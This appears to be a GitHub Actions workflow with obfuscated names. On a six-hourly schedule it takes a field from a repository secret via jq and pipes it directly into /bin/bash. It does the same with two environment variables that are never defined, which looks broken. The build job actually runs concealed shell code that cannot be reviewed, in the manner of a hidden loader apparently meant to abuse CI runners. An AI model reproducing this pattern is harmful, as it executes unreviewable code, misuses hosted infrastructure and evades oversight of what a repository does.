name: charcoalterrorist
on:
  workflow_dispatch:
  schedule:
    - cron: '29 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: charcoalterrorist
        env:
          m0: ${{ secrets.m0 }}
        run: |
          echo $m0 | jq -r .k19 | /bin/bash
          echo $re5725 | jq -r .aw1 | /bin/bash
          echo $frkw7407 | jq -r .fhaik136 | /bin/bash

